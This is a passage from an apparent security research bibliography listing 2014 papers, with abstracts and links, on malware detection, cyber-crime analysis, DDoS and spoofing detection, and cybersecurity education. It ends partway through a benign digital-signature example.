  • Sayed, Bassam; Traore, Issa, "Protection against Web 2.0 Client-Side Web Attacks Using Information Flow Control," Advanced Information Networking and Applications Workshops (WAINA), 2014 28th International Conference on , vol., no., pp.261,268, 13-16 May 2014. The dynamic nature of Web 2.0 and the heavy obfuscation of web-based attacks complicate the job of traditional protection systems such as firewalls, anti-virus solutions, and IDS systems. Using ready-made toolkits, cyber-criminals can launch sophisticated attacks such as cross-site scripting (XSS) and cross-site request forgery (CSRF), and operate botnets, to name a few. In recent years, cyber-criminals have targeted legitimate websites and social networks to inject malicious scripts that compromise the security of the visitors of such websites. This involves performing actions using the victim's browser without his or her permission. This poses the need to develop effective mechanisms for protecting against Web 2.0 attacks that mainly target the end-user. In this paper, we address the above challenges from an information flow control perspective by developing a framework that restricts the flow of information on the client side to legitimate channels. The proposed model tracks sensitive information flow and prevents information leakage from happening. When applied to the context of client-side web-based attacks, the proposed model is expected to provide a more secure browsing environment for the end-user.
    Keywords: AJAX; Client-side web attacks; Information Flow Control; Web 2.0 (ID#:14-2065)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6844648&isnumber=6844560
  • Wei Peng; Feng Li; Xukai Zou; Jie Wu, "Behavioral Malware Detection in Delay Tolerant Networks," Parallel and Distributed Systems, IEEE Transactions on , vol.25, no.1, pp.53,63, Jan. 2014. The delay-tolerant-network (DTN) model is becoming a viable communication alternative to the traditional infrastructural model for modern mobile consumer electronics equipped with short-range communication technologies such as Bluetooth, NFC, and Wi-Fi Direct. Proximity malware is a class of malware that exploits the opportunistic contacts and distributed nature of DTNs for propagation. Behavioral characterization of malware is an effective alternative to pattern matching in detecting malware, especially when dealing with polymorphic or obfuscated malware. In this paper, we first propose a general behavioral characterization of proximity malware based on a naive Bayesian model, which has been successfully applied in non-DTN settings such as filtering email spam and detecting botnets. We identify two unique challenges for extending Bayesian malware detection to DTNs ("insufficient evidence versus evidence collection risk" and "filtering false evidence sequentially and distributedly"), and propose a simple yet effective method, look ahead, to address the challenges. Furthermore, we propose two extensions to look ahead, dogmatic filtering and adaptive look ahead, to address the challenge of "malicious nodes sharing false evidence." Real mobile network traces are used to verify the effectiveness of the proposed methods. (A minimal Bayesian-update sketch follows this citation.)
    Keywords: Bayes methods; delay tolerant networks; filtering theory; invasive software; mobile radio; Bayesian malware detection; DTN model; adaptive look ahead; behavioral characterization; delay-tolerant-network model; dogmatic filtering; modern mobile consumer electronics; naive Bayesian model; obfuscated malware; polymorphic malware; proximity malware; short-range communication technologies; Aging; Bayesian methods; Bluetooth; Equations; Malware; Mathematical model; Silicon; Bayesian filtering; Delay-tolerant networks; behavioral malware characterization; proximity malware (ID#:14-2067)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6463391&isnumber=6674937
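The naive Bayesian core of such an approach can be sketched as a sequential posterior update over behavioral observations; the likelihood values and prior below are assumptions, not the paper's parameters, and the sketch omits the look-ahead and dogmatic-filtering extensions.

```python
# A minimal sequential Bayes update for "is this neighbor malicious?".
def update_posterior(prior, evidence, p_sus_given_mal=0.8, p_sus_given_good=0.1):
    """evidence: iterable of 1 (suspicious behavior) or 0 (normal behavior)."""
    p = prior
    for e in evidence:
        like_mal = p_sus_given_mal if e else 1 - p_sus_given_mal
        like_good = p_sus_given_good if e else 1 - p_sus_given_good
        p = like_mal * p / (like_mal * p + like_good * (1 - p))  # Bayes' rule
    return p

print(update_posterior(0.05, [1, 1, 0, 1]))  # posterior after four observations
```

The paper's "insufficient evidence versus evidence collection risk" trade-off corresponds to deciding how long this evidence sequence must grow before cutting a node off.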
  • Carter, K.; Idika, N.; Streilein, W., "Probabilistic Threat Propagation for Network Security," Information Forensics and Security, IEEE Transactions on, vol. PP, no.99, pp.1,1, July 2014. Techniques for network security analysis have historically focused on the actions of network hosts. Outside of forensic analysis, little has been done to detect or predict malicious or infected nodes strictly based on their association with other known malicious nodes. This methodology is highly prevalent in the graph analytics world, however, where it is referred to as community detection. In this paper, we present a method for detecting malicious and infected nodes on both monitored networks and the external Internet. We leverage prior community detection and graphical modeling work by propagating threat probabilities across network nodes, given an initial set of known malicious nodes. We enhance prior work by employing constraints that remove the adverse effect of cyclic propagation that is a byproduct of current methods. We demonstrate the effectiveness of Probabilistic Threat Propagation on the tasks of detecting botnets and malicious web destinations. (A schematic sketch of the propagation step follows this citation.)
    Keywords: Communication networks; Communities; Peer-to-peer computing; Probabilistic logic; Probability; Security; Upper bound (ID#:14-2068)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6847231&isnumber=4358835
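A schematic version of the propagation step is sketched below: threat probability spreads from seed nodes to their neighbors under a damping weight, with seed values pinned. The update rule and weight are illustrative, not the authors' exact formulation, and the sketch omits the paper's constraint that removes cyclic self-reinforcement.

```python
# A minimal damped threat-propagation iteration over an undirected graph.
def propagate_threat(adj, seeds, weight=0.5, iters=20):
    """adj: {node: [neighbors]}; seeds: set of known-malicious nodes."""
    p = {n: (1.0 if n in seeds else 0.0) for n in adj}
    for _ in range(iters):
        nxt = {}
        for n, nbrs in adj.items():
            if n in seeds:
                nxt[n] = 1.0          # seed probabilities stay fixed
                continue
            miss = 1.0
            for m in nbrs:
                miss *= 1.0 - weight * p[m]
            nxt[n] = 1.0 - miss       # threat via at least one neighbor
        p = nxt
    return p

graph = {"a": ["b"], "b": ["a", "c"], "c": ["b", "d"], "d": ["c"]}
print(propagate_threat(graph, seeds={"a"}))
```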
  • Janbeglou, Maziar; Naderi, Habib; Brownlee, Nevil, "Effectiveness of DNS-Based Security Approaches in Large-Scale Networks," Advanced Information Networking and Applications Workshops (WAINA), 2014 28th International Conference on , vol., no., pp.524,529, 13-16 May 2014. The Domain Name System (DNS) is widely seen as a vital protocol of the modern Internet. For example, popular services like load balancers and Content Delivery Networks rely heavily on DNS. Because of its important role, DNS is also a desirable target for malicious activities such as spamming, phishing, and botnets. To protect networks against these attacks, a number of DNS-based security approaches have been proposed. The key insight of our study is to measure the effectiveness of security approaches that rely on DNS in large-scale networks. For this purpose, we answer the following questions: How often is DNS used? Are most Internet flows established after contacting DNS? In this study, we collected data from the University of Auckland campus network, with more than 33,000 Internet users, and processed it to find out how DNS is being used. Moreover, we studied the flows that were established with and without contacting DNS. Our results show that less than 5 percent of the observed flows use DNS. Therefore, we argue that security approaches that depend solely on DNS are not sufficient to protect large-scale networks.
    Keywords: DNS; large-scale network; network measurement; passive monitoring; statistical analysis (ID#:14-2069)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6844690&isnumber=6844560

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Cyber-crime Analysis

Cyber-crime Analysis



As cyber-crime grows, methods for preventing, detecting, and responding are growing as well. Research is examining new, faster, and more automated methods for dealing with cyber-crime from both a technical and a behavioral standpoint. The articles cited here examine a number of facets of the problem and were published in the first half of 2014.

  • Khobragade, P.K.; Malik, L.G., "Data Generation and Analysis for Digital Forensic Application Using Data Mining," Communication Systems and Network Technologies (CSNT), 2014 Fourth International Conference on , vol., no., pp.458,462, 7-9 April 2014. Cyber crime produces huge volumes of log and transactional data, which amounts to a great deal of data to store and analyze. It is difficult for forensic investigators to devote the time needed to find clues in and analyze all of these data. Network forensic analysis involves network traces and the detection of attacks. Traces include Intrusion Detection System and firewall logs, logs generated by network services and applications, and packet captures by sniffers. Because so much data is generated by every event in the network, finding clues and analyzing them is a challenge. Network forensics deals with the monitoring, capturing, recording, and analysis of network traffic in order to detect intrusions and investigate them. This paper focuses on data collection from the cyber system and the web browser. FTK 4.0 is discussed for memory forensic analysis and remote system forensics, which is to be used as evidence to aid investigation.
    Keywords: computer crime; data analysis; data mining; digital forensics; firewalls; storage management; FTK 4.0; Web browser; cyber-crime huge log data; cyber system; data analysis; data collection; data generation; data mining; data storage; digital forensic application; firewall logs; intrusion detection system; memory forensic analysis; network attack detection; network forensic analysis; network traces; network traffic; packet captures; remote system forensic; transactional data; Computers; Data mining; Data visualization; Databases; Digital forensics; Security; Clustering; Data Collection; Digital forensic tool; Log Data collection (ID#:14-2070)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6821438&isnumber=6821334
  • Harsch, A; Idler, S.; Thurner, S., "Assuming a State of Compromise: A Best Practise Approach for SMEs on Incident Response Management," IT Security Incident Management & IT Forensics (IMF), 2014 Eighth International Conference on , vol., no., pp.76,84, 12-14 May 2014. Up-to-date studies and surveys regarding IT security show that companies of every size and sector nowadays face the growing risk of cyber crime. Many tools, standards, and best practices are in place to support enterprise IT security experts in dealing with the upcoming risks, while small and medium-sized enterprises (SMEs) in particular feel helpless in struggling with the growing threats. This article describes an approach by which SMEs can attain high-quality assurance of whether they are a victim of cyber crime, what kind of damage resulted from a certain attack, and in what way remediation can be done. The focus in all steps of the analysis lies on economic feasibility and the typical environment of SMEs.
    Keywords: computer crime; small-to-medium enterprises; SME; best practices; cybercrime; economic feasibility; enterprise IT security experts; incident response management; small and medium sized enterprises; Companies; Computer crime; Forensics; Malware; IT Security; Incident Response; SME; cybercrime; remediation (ID#:14-2071)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6824083&isnumber=6824069
  • Mukaddam, A; Elhajj, I; Kayssi, A; Chehab, A, "IP Spoofing Detection Using Modified Hop Count," Advanced Information Networking and Applications (AINA), 2014 IEEE 28th International Conference on , vol., no., pp.512,516, 13-16 May 2014. With the global widespread usage of the Internet, more and more cyber-attacks are being performed. Many of these attacks utilize IP address spoofing. This paper describes IP spoofing attacks and the methods currently available to detect or prevent them. In addition, it presents a statistical analysis of the Hop Count parameter used in our proposed IP spoofing detection algorithm. We propose an algorithm, inspired by the Hop Count Filtering (HCF) technique, that changes the learning phase of HCF to include all possible available Hop Count values. Compared to the original HCF method and its variants, our proposed method increases the true positive rate by at least 9% and consequently increases the overall accuracy of an intrusion detection system by at least 9%. In general, the proposed method performs better than the HCF method and its variants. (A minimal hop-count inference sketch follows this citation.)
    Keywords: IP networks; Internet; computer network security; statistical analysis; HCF learning phase; IP address spoofing utilization; IP spoofing attacks; IP spoofing detection; Internet; hop count filtering technique; modified hop count parameter; statistical analysis; Computer crime; Filtering; IP networks; Internet; Routing protocols; Testing; IP spoofing; hop count; hop count filtering; statistical analysis (ID#:14-2072)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838707&isnumber=6838626
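The hop-count inference at the core of HCF-style checks can be sketched as follows: infer the hop count from the observed TTL by assuming the nearest common initial TTL, then compare against the value previously learned for that source. The initial-TTL set and zero slack are simplifying assumptions.

```python
# A minimal TTL-to-hop-count check; common initial TTLs assumed to be these four.
INITIAL_TTLS = (32, 64, 128, 255)

def hop_count(observed_ttl):
    """Distance travelled, assuming the nearest initial TTL at or above the observation."""
    initial = min(t for t in INITIAL_TTLS if t >= observed_ttl)
    return initial - observed_ttl

def looks_spoofed(observed_ttl, learned_hops, slack=0):
    """Flag packets whose inferred hop count disagrees with the learned one."""
    return abs(hop_count(observed_ttl) - learned_hops) > slack

print(hop_count(49))             # 64 - 49 = 15 hops
print(looks_spoofed(49, 15))     # False: consistent with the learned distance
print(looks_spoofed(120, 15))    # True: 128 - 120 = 8 hops, far from 15
```

The paper's modification concerns the learning phase, i.e., which hop-count values are admitted into the per-source table that this check consults.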
  • Fachkha, C.; Bou-Harb, E.; Debbabi, M., "Fingerprinting Internet DNS Amplification DDoS Activities," New Technologies, Mobility and Security (NTMS), 2014 6th International Conference on , vol., no., pp.1,5, March 30 2014-April 2 2014. This work proposes a novel approach to infer and characterize Internet-scale DNS amplification DDoS attacks by leveraging the darknet space. Complementary to the pioneering work on inferring Distributed Denial of Service (DDoS) activity using darknets, this work shows that DDoS activities can be extracted without relying on backscatter analysis. The aim of this work is to extract cyber security intelligence related to DNS amplification DDoS activities, such as detection period, attack duration, intensity, packet size, rate, and geolocation, in addition to various network-layer and flow-based insights. To achieve this task, the proposed approach exploits certain DDoS parameters to detect the attacks. We empirically evaluate the proposed approach using 720 GB of real darknet data collected from a /13 address space during a recent three-month period. Our analysis reveals that the approach was successful in inferring significant DNS amplification DDoS activities, including the recent prominent attack that targeted one of the largest anti-spam organizations. Moreover, the analysis disclosed the mechanism of such DNS amplification DDoS attacks. Further, the results uncover high-speed and stealthy attempts that were never previously documented. The case study of the largest DDoS attack in history led to a better understanding of the nature and scale of this threat and can generate inferences that could contribute to detecting, preventing, assessing, mitigating, and even attributing DNS amplification DDoS activities.
    Keywords: Internet; computer network security; Internet-scale DNS amplification DDoS attacks; anti-spam organizations; attack duration; backscattered analysis; cyber security intelligence; darknet space; detection period; distributed denial of service; fingerprinting Internet DNS amplification DDoS activities; geolocation; network-layer; packet size; storage capacity 720 Gbit; Computer crime; Grippers; IP networks; Internet; Monitoring; Sensors (ID#:14-2073)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814019&isnumber=6813963
  • Sgouras, K.I; Birda, AD.; Labridis, D.P., "Cyber attack impact on critical Smart Grid infrastructures," Innovative Smart Grid Technologies Conference (ISGT), 2014 IEEE PES , vol., no., pp.1,5, 19-22 Feb. 2014. Electrical Distribution Networks face new challenges by the Smart Grid deployment. The required metering infrastructures add new vulnerabilities that need to be taken into account in order to achieve Smart Grid functionalities without considerable reliability trade-off. In this paper, a qualitative assessment of the cyber attack impact on the Advanced Metering Infrastructure (AMI) is initially attempted. Attack simulations have been conducted on a realistic Grid topology. The simulated network consisted of Smart Meters, routers and utility servers. Finally, the impact of Denial-of-Service and Distributed Denial-of-Service (DoS/DDoS) attacks on distribution system reliability is discussed through a qualitative analysis of reliability indices.
    Keywords: computer network security; power distribution reliability; power engineering computing; power system security; smart meters; smart power grids; AMI; DoS-DDoS attacks; advanced metering infrastructure; critical smart grid infrastructures; cyber attack impact; distributed denial-of-service attacks; distribution system reliability; electrical distribution networks; grid topology; qualitative assessment; routers; smart grid deployment; smart meters; utility servers; Computer crime; Reliability; Servers; Smart grids; Topology; AMI; Cyber Attack; DDoS; DoS; Reliability; Simulation; Smart Grid (ID#:14-2074)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6816504&isnumber=6816367
  • Sung-Hwan Ahn; Nam-Uk Kim; Tai-Myoung Chung, "Big data analysis system concept for detecting unknown attacks," Advanced Communication Technology (ICACT), 2014 16th International Conference on , vol., no., pp.269,272, 16-19 Feb. 2014. Recently, the threat of previously unknown cyber-attacks has been increasing because existing security systems are not able to detect them. Past cyber-attacks had simple purposes, such as leaking personal information by attacking a PC or destroying a system. However, the goal of recent hacking attacks has changed from leaking information and destroying services to attacking large-scale systems such as critical infrastructures and state agencies. Meanwhile, existing defense technologies to counter these attacks are based on pattern matching methods, which are very limited. Because of this, in the event of new and previously unknown attacks, the detection rate becomes very low and false negatives increase. To defend against these unknown attacks, which cannot be detected with existing technology, we propose a new model based on big data analysis techniques that can extract information from a variety of sources to detect future attacks. We expect our model to be the basis of future Advanced Persistent Threat (APT) detection and prevention system implementations.
    Keywords: Big Data; computer crime; data mining; APT detection; Big Data analysis system; Big Data analysis techniques; advanced persistent threat detection; computer crime; critical infrastructures; cyber-attacks; data mining; defense technologies; detection rate; future attack detection; hacking attacks; information extraction; large-scale system attacks; pattern matching methods; personal information leakage; prevention system; security systems; service destruction; state agencies; unknown attack detection; Data handling; Data mining; Data models; Data storage systems; Information management; Monitoring; Security; Alarm systems; Computer crime; Data mining; Intrusion detection (ID#:14-2075)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6778962&isnumber=6778899
  • Yi-Lu Wang; Sang-Chin Yang, "A Method of Evaluation for Insider Threat," Computer, Consumer and Control (IS3C), 2014 International Symposium on , vol., no., pp.438,441, 10-12 June 2014. Cyber security is an important issue for cloud computing, and the insider threat is an increasingly important, and considerably more complex, part of it. Yet to date there is no equivalent of a vulnerability scanner for insider threats. We survey and discuss the history of research on insider threat analysis, finding that system dynamics is the best method for mitigating insider threats arising from people, process, and technology. In the paper, we present a system dynamics method for modeling the insider threat and suggest conclusions for future research on the insider threat issue.
    Keywords: cloud computing; security of data; cloud computing; cyber security; insider threat analysis; insider threat evaluation; insider threat mitigation; vulnerability scanner; Analytical models; Computer crime; Computers; Educational institutions; Organizations; Insider threat; System Dynamic (ID#:14-2076)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6845913&isnumber=6845429
  • Djouadi, Seddik M.; Melin, Alexander M.; Ferragut, Erik M.; Laska, Jason A; Dong, Jin, "Finite energy and bounded attacks on control system sensor signals," American Control Conference (ACC), 2014 , vol., no., pp.1716,1722, 4-6 June 2014. Control system networks are increasingly being connected to enterprise-level networks. These connections leave critical industrial control systems vulnerable to cyber-attacks. Most of the effort in protecting these cyber-physical systems (CPS) from attacks has been in securing the networks using information security techniques. Effort has also been applied to increasing the protection and reliability of the control system against random hardware and software failures. However, the inability of information security techniques to protect against all intrusions means that the control system must be resilient to various signal attacks, for which new analysis methods need to be developed. In this paper, sensor signal attacks are analyzed for observer-based controlled systems. The threat surface for sensor signal attacks is subdivided into denial of service, finite energy, and bounded attacks. In particular, the error signals between states of attack-free systems and systems subject to these attacks are quantified. Optimal sensor and actuator signal attacks for the finite and infinite horizon linear quadratic (LQ) control, in terms of maximizing the corresponding cost functions, are computed. The closed-loop systems under optimal signal attacks are provided. Finally, an illustrative numerical example using a power generation network is provided, together with distributed LQ controllers. (A toy simulation sketch follows this citation.)
    Keywords: Closed loop systems; Computer crime; Cost function; Eigenvalues and eigenfunctions; Generators; Vectors; Control applications; Emerging control theory; Fault-tolerant systems (ID#:14-2077)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6859001&isnumber=6858556
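A toy scalar sketch of the setting, not the paper's LQ analysis: compare trajectories of a stabilized feedback loop with and without a bounded additive attack on the sensed output, and quantify the induced error signal. The plant, gain, and attack waveform are all invented for illustration.

```python
# Minimal simulation of a bounded sensor-signal attack on a scalar feedback loop.
import numpy as np

a, b, k = 1.1, 1.0, 0.6          # unstable plant x' = a*x + b*u, stabilizing gain k
steps, bound = 50, 0.2           # horizon and attack magnitude bound

def run(attack):
    x, xs = 1.0, []
    for t in range(steps):
        y = x + (attack(t) if attack else 0.0)  # sensed (possibly attacked) output
        u = -k * y                               # feedback acts on the sensed value
        x = a * x + b * u
        xs.append(x)
    return np.array(xs)

clean = run(None)
attacked = run(lambda t: bound * np.sign(np.sin(0.3 * t)))  # bounded attack signal
print("max |state error| under attack:", np.max(np.abs(attacked - clean)))
```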

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Cybersecurity Education

Cybersecurity Education


As a discipline in higher education, cybersecurity is less than two decades old. But because of the large number of qualified professionals needed, many universities offer cybersecurity education in a variety of delivery formats--live, online, and hybrid. Much of the curriculum has been driven by NSTISSI standards written in the early 1990s. A new look, based on research, is producing new ideas for how to better train cybersecurity professionals. The articles cited here are from the first half of 2014.

  • Conklin, W.A; Cline, R.E.; Roosa, T., "Re-engineering Cybersecurity Education in the US: An Analysis of the Critical Factors," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.2006,2014, 6-9 Jan. 2014. doi: 10.1109/HICSS.2014.254 The need for cyber security professionals continues to grow, and education systems are responding in a variety of ways. The US government has weighed in with two efforts: the NICE effort led by NIST and the CAE effort jointly led by NSA and DHS. Industry has unfilled needs, and the CAE program is changing to meet both NICE and industry needs. This paper analyzes these efforts and examines several critical, yet unaddressed, issues facing school programs as they adapt to new criteria and guidelines. Technical issues are easy to enumerate, yet it is the programmatic and student success factors that will define successful programs.
    Keywords: computer science education; security of data; CAE program; DHS; Department of Homeland Security; NICE effort; NIST; NSA; National Initiative for Cybersecurity Education; National Security Agency; US government; critical factors analysis; cyber security professionals; cybersecurity education re-engineering; education systems; programmatic factors; school programs; student success factors; Computer security; Educational institutions; Government; Industries; Information security (ID#:14-2078)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6758852&isnumber=6758592
  • Kessler, G.C.; Ramsay, J.D., "A Proposed Curriculum in Cybersecurity Education Targeting Homeland Security Students," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.4932,4937, 6-9 Jan. 2014. doi: 10.1109/HICSS.2014.605 Homeland Security (HS) is a growing field of study in the U.S. today, generally covering risk management, terrorism studies, policy development, and other topics related to the broad field. Information security threats to both the public and private sectors are growing in intensity, frequency, and severity, and are a very real threat to the security of the nation. While there are many models for information security education at all levels of higher education, these programs are invariably offered as a technical course of study, and such curricula are generally not well suited to HS students. As a result, information systems and cyber security principles are underrepresented in the typical HS program. The authors propose a course of study in cyber security designed to capitalize on the intellectual strengths of students in this discipline and to be consistent with the broad suite of professional needs of the discipline.
    Keywords: computer aided instruction; educational courses; further education; risk management; security of data; HS; cyber security principles; cybersecurity education; higher education; homeland security students; information security; information security education; information systems; policy development; private sectors; proposed curriculum; public sectors; risk management; terrorism studies; Computer security; Computers; Cyberspace; Education; Information security; Terrorism; Homeland security education; cybersecurity education (ID#:14-2079)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6759208&isnumber=6758592
  • Barclay, Corlane, "Sustainable Security Advantage In A Changing Environment: The Cybersecurity Capability Maturity Model (CM2)," ITU Kaleidoscope Academic Conference: Living in a converged world - Impossible without standards?, Proceedings of the 2014 , vol., no., pp.275,282, 3-5 June 2014 doi: 10.1109. With the rapid advancement of technology and the growing complexity of the interactions among these technologies and networks, it is ever more important for countries and organizations to gain a sustainable security advantage. Security advantage refers to the ability to manage and respond to threats and vulnerabilities with a proactive security posture. This is accomplished through effectively planning for, managing, responding to, and recovering from threats and vulnerabilities. However, not many organizations, or even countries, especially in the developing world, have been able to equip themselves with the necessary and sufficient know-how or ability to integrate knowledge and capabilities to achieve a security advantage within their environment. Having a structured set of requirements or indicators to aid in progressively attaining different levels of maturity and capability is one important method of determining the state of cybersecurity readiness. The research introduces the Cybersecurity Capability Maturity Model (CM2), a 6-step process of progressive development of cybersecurity maturity and knowledge integration that ranges from a state of limited awareness and application of security controls to pervasive optimization of the protection of critical assets.
    Keywords: Capability maturity model; Computer crime; Context; Education; Organizations; CM2; capabilities; cybersecurity Capability Maturity Model; privacy; security; security advantage (ID#:14-2080)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6858466&isnumber=6858455
  • Daniel Manson, Ronald Pike, "The Case For Depth In Cybersecurity Education," ACM Inroads, Volume 5 Issue 1, March 2014, Pages 47-52. doi: 10.1145/2568195.2568212. In his book Outliers, Malcolm Gladwell describes the 10,000-Hour Rule, a key to success in any field, as simply a matter of practicing a specific task that can be accomplished with 20 hours of work a week for 10 years [10]. Ongoing changes in technology and national security needs require aspiring excellent cybersecurity professionals to set a goal of 10,000 hours of relevant, hands-on skill development. The education system today is ill prepared to meet the challenge of producing an adequate number of cybersecurity professionals, but programs that use competitions and learning environments that teach depth are filling this void.
    Keywords: cybersecurity, depth, education (ID#:14-2081)
    URL: http://dl.acm.org/citation.cfm?doid=2568195.2568212 or http://doi.acm.org/10.1145/2568195.2568212
  • Marcin Lukowiak, Stanislaw Radziszowski, James Vallino, Christopher Wood, "Cybersecurity Education: Bridging the Gap Between Hardware and Software Domains," ACM Transactions on Computing Education (TOCE), Volume 14 Issue 1, March 2014, Article No. 2. With the continuous growth of cyberinfrastructure throughout modern society, the need for secure computing and communication is more important than ever before. As a result, there is also an increasing need for entry-level developers who are capable of designing and building practical solutions for systems with stringent security requirements. This calls for careful attention to algorithm choice and implementation method, as well as trade-offs between hardware and software implementations. This article describes the motivation and efforts taken by three departments at Rochester Institute of Technology (Computer Engineering, Computer Science, and Software Engineering) to create a multidisciplinary course that integrates the algorithmic, engineering, and practical aspects of security as exemplified by applied cryptography. In particular, the article presents the structure of this new course, topics covered, lab tools, and results from the first two spring quarter offerings in 2011 and 2012.
    Keywords: Security-oriented curriculum, cybersecurity education, hardware and software design, multidisciplinary applied cryptography (ID#:14-2082)
    URL: http://dl.acm.org/citation.cfm?doid=2600089.2538029 or http://doi.acm.org/10.1145/2538029
  • David Klaper, Eduard Hovy, "A Taxonomy And A Knowledge Portal For Cybersecurity," Proceedings of the 15th Annual International Conference on Digital Government Research , June 2014, Pages 79-85. doi: 10.1145/2612733.2612759. Smart government is possible only if the security of sensitive data can be assured. The more knowledgeable government officials and citizens are about cybersecurity, the better the chances that government data is not compromised or abused. In this paper, we present two systems under development that aim at improving cybersecurity education. First, we are creating a taxonomy of cybersecurity topics that provides links to relevant educational or research material. Second, we are building a portal that serves as a platform for users to discuss the security of websites. These sources can be linked together, which helps to strengthen the knowledge of government officials and citizens with regard to cybersecurity issues. These issues are a central concern for open government initiatives.
    Keywords: cybersecurity, education, systematization, taxonomy (ID#:14-2083)
    URL: http://dl.acm.org/citation.cfm?doid=2612733.2612759 or http://doi.acm.org/10.1145/2612733.2612759
  • Barbara E. Endicott-Popovsky, Viatcheslav M. Popovsky, "Application of Pedagogical Fundamentals For The Holistic Development Of Cybersecurity Professionals," ACM Inroads, Volume 5 Issue 1, March 2014, Pages 57-68. doi: 10.1145/2568195.2568214. Nowhere is the problem of a lack of human capital more keenly felt than in the field of cybersecurity, where the numbers and quality of well-trained graduates are woefully lacking [10]. In 2005, the National Academy of Sciences indicted the US education system as the culprit contributing to deficiencies in our technical workforce, sounding the alarm that we are at risk of losing our competitive edge [14]. While the government has made cybersecurity education a national priority, seeking to stimulate university and community college production of information assurance (IA) expertise, thousands of IA jobs still go unfilled. The big question for the last decade [17] has been 'where will we find the talent we need?' In this article, we describe one university's approach to begin addressing this problem and discuss an innovative curricular model that holistically develops future cybersecurity professionals.
    Keywords: cybersecurity, education and workforce development, pedagogy (ID#:14-2084)
    URL: http://dl.acm.org/citation.cfm?doid=2568195.2568214 or http://doi.acm.org/10.1145/2568195.2568214
  • Andrew McGettrick, Lillian N. Cassel, Melissa Dark, Elizabeth K. Hawthorne, John Impagliazzo, "Toward Curricular Guidelines For Cybersecurity," Proceedings of the 45th ACM Technical Symposium On Computer Science Education, March 2014, Pages 81-82. doi: 10.1145/2538862.2538990. This session reports on a workshop convened by the ACM Education Board with funding from the US National Science Foundation and invites discussion from the community on the workshop findings. The topic, curricular directions for cybersecurity, is one that resonates in many departments considering how best to prepare graduates to face the challenges of security issues in employment and future research. The session will include a presentation of the workshop context and conclusions, but will be open to participant discussion. This will be the first public presentation of the results of the workshop and the first opportunity for significant response.
    Keywords: curriculum, security (ID#:14-2085)
    URL: http://dl.acm.org/citation.cfm?doid=2538862.2538990 or http://doi.acm.org/10.1145/2538862.2538990
  • Khaled Salah, "Harnessing the Cloud For Teaching Cybersecurity," Proceedings of the 45th ACM Technical Symposium On Computer Science Education, March 2014, Pages 529-534. doi: 10.1145/2538862.2538880. Cloud computing has become an attractive paradigm for many organizations in government and industry as well as academia. In academia, the cloud can offer instructors and students (whether local or at a distance) on-demand, dedicated, isolated, unlimited, and easily configurable machines. Such an approach has clear advantages over access to machines in a classic lab setting. In this paper, we show how cloud services and infrastructure can be harnessed to facilitate practical experience and training for cybersecurity. We used the popular Amazon Web Services (AWS) cloud; however, the use cases and approaches laid out in this paper are also applicable to other cloud providers.
    Keywords: cloud, cloud computing, computer security, cybersecurity, long distance education, network security, security (ID#:14-2086)
    URL: http://dl.acm.org/citation.cfm?doid=2538862.2538880 or http://doi.acm.org/10.1145/2538862.2538880
  • David H. Tobey, Portia Pusey, Diana L. Burley, "Engaging Learners In Cybersecurity Careers: Lessons From The Launch Of The National Cyber League," ACM Inroads, Volume 5 Issue 1, March 2014, Pages 53-56. doi: 10.1145/2568195.2568213. Educators and sponsors endorse competitions as a strong, positive influence on career choice. However, empirical studies of cybersecurity competitions are lacking, and evidence from computer science and mathematics competitions has been mixed. Here we report initial results from an ongoing study of the National Cyber League to provide a glimpse of the role of competitions in fostering cybersecurity career engagement. Preliminary results suggest that cyber competitions attract experienced individuals who will remain in the profession for the long term, but future research is needed to understand how cyber competitions may engage women and those new to the field.
    Keywords: competitions, cybersecurity, education and workforce development (ID#:14-2088)
    URL: http://dl.acm.org/citation.cfm?doid=2568195.2568213 or http://doi.acm.org/10.1145/2568195.2568213

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Digital Signature Security

Digital Signature Security



A digital signature is one of the most common ways to authenticate a message. Using a mathematical scheme, the signature assures the reader that the message was created and sent by a known sender and was not altered in transit. But not all signature schemes are secure. The research challenge is to find new and better ways to protect, transfer, and utilize digital signatures. The articles cited here, published in the first half of 2014, discuss both theory and practice; a minimal sign-and-verify sketch follows.
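As a concrete illustration of the sign-and-verify flow described above, the sketch below uses Ed25519 from the pyca/cryptography package; the choice of scheme and library is ours, not drawn from the cited papers.

```python
# A minimal digital signature round trip with pyca/cryptography (Ed25519).
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.exceptions import InvalidSignature

private_key = Ed25519PrivateKey.generate()   # signer's secret
public_key = private_key.public_key()        # shared with verifiers

message = b"an example message"
signature = private_key.sign(message)        # signer's step

try:
    public_key.verify(signature, message)    # verifier's step; raises on failure
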